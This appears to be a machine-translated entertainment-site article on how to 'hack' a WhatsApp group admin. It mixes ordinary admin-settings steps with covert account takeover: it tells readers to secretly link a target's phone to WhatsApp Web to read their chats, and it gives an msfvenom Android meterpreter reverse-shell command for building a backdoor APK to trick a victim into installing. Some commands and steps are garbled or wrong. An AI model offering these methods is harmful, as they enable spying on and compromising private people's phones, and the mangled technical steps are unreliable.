Kapanlagi.com - WhatsApp is one of the applications used as a sophisticated communication tool. In fact, there are many services provided by WhatsApp application. One of them is a group, but for KLovers who want to hack WhatsApp group admin, there are steps to do it.
Yes, sometimes there are group admins who harm a group. Until, the only way is to remove them. There are several ways to hack WhatsApp group admin that KLovers can do easily and practically. However, it should be noted that some ways to hack WhatsApp group admin can disturb someone's privacy.
But, if this is urgent and for good purposes, then you can use it. Therefore, quoted from various sources, here's how to hack WhatsApp group admin that you can do correctly. There are ways to hack WhatsApp group admin using additional applications or even without any applications.
1. Using WhatsApp Settings

Illustration (credit: Pexels)
The first way to hack a WhatsApp group admin is by using the settings in the WhatsApp application. Yes, this method can be a starting point for KLovers if they want to remove an admin from a WhatsApp group. Here's how to hack a WhatsApp group admin using the settings:
1. First, you can open the WhatsApp group chat as usual.
2. After that, you can directly tap the group subject.
3. Then tap "Group Settings" and select "Edit Group Admin".
4. Tap the check mark of the user you want to remove as an admin.
5. However, please note that the person who created the group (initial admin) cannot be removed as a WhatsApp admin. Their status as an admin can only be removed if they leave the group.
2. Using WhatsApp Web

Illustration (credit: Pexels)
You can also hack a WhatsApp group admin using WhatsApp Web. Yes, you can do this if you want to make someone leave an admin from a WhatsApp group. Here are some ways to hack a WhatsApp group admin using WhatsApp Web:
1. Prepare a laptop if you want to spy on WhatsApp through a PC.
2. Then make sure the internet is connected, and open the Whatsapp Web site through Google.
3. After that, make sure the WhatsApp application on the person's smartphone you want to hack has been changed to WhatsApp Web, KLovers.
4. How to check it is by opening the WhatsApp application, then select the three dots in the upper right corner.
5. Then you can select the linked device, and activate it.
6. After that, a barcode scan will appear, then go to the WhatsApp Web site page, and scan the barcode.
7. When it's successful, you will immediately enter the WhatsApp application on the person's smartphone you want to hack through WhatsApp Web.
8. After successfully hacking, you can view chat history, calls, status, and even remove the person from the WhatsApp group.
3. Becoming a WhatsApp Group Admin

Illustration (credit: Pexels)
Then the second way to hack a WhatsApp group admin is by becoming an admin in the group. Yes, this method can be a solution if you are not an admin in a WhatsApp group, but want to remove the admin from the group. And here's how to hack a WhatsApp group admin by becoming a WhatsApp group admin.
1. Make sure you meet the criteria to become a group admin, KLovers.
2. After that, you can open WhatsApp. Then contact the Group Admin.
3. Ask the admin to make you an admin.
4. Once you have entered and become an admin, you can go directly to the "Group Info"
5. If you have, then you can click on "Select Contact" to be made an admin or remove as an admin.
6. Finally, click on "Remove Admin" and done.
4. Using the Termux Application

Illustration (credit: Pexels)
And the last way to hack a WhatsApp group admin is by using the Termux application. Yes, this application can be used as one of the easy and practical ways to hack a WhatsApp group admin. And here are some ways to hack a WhatsApp group admin using the Termux application.
1. Download and install the Termux application via Google Play Store.
2. After installation, open the Termux application on your phone.
3. Then check your own IP address by typing IpConfig in the Termux application.
4. Type the Script msfvenom -p android/meterpreter/reverse_tcp LHOST= R >hack.apk
5. Then on the sentence "LHOST" please replace it with your own IP address.
6. If it's done, see the backdoor file that has been created by opening the "File" menu, then "Home", and hack.apk
7. Send the Backdoor File to the person you want to hack. And make the target install the application you sent earlier.
8. After successfully installing the apk file that you sent, you can see the WhatsApp account activity that was hacked earlier.
Those are some ways to hack a WhatsApp group admin that KLovers can do easily and practically. You can do it using additional applications to settings. However, this is not to be used for things that are detrimental, KLovers. Good luck.
Disclaimer: This translation from Bahasa Indonesia to English has been generated by Artificial Intelligence.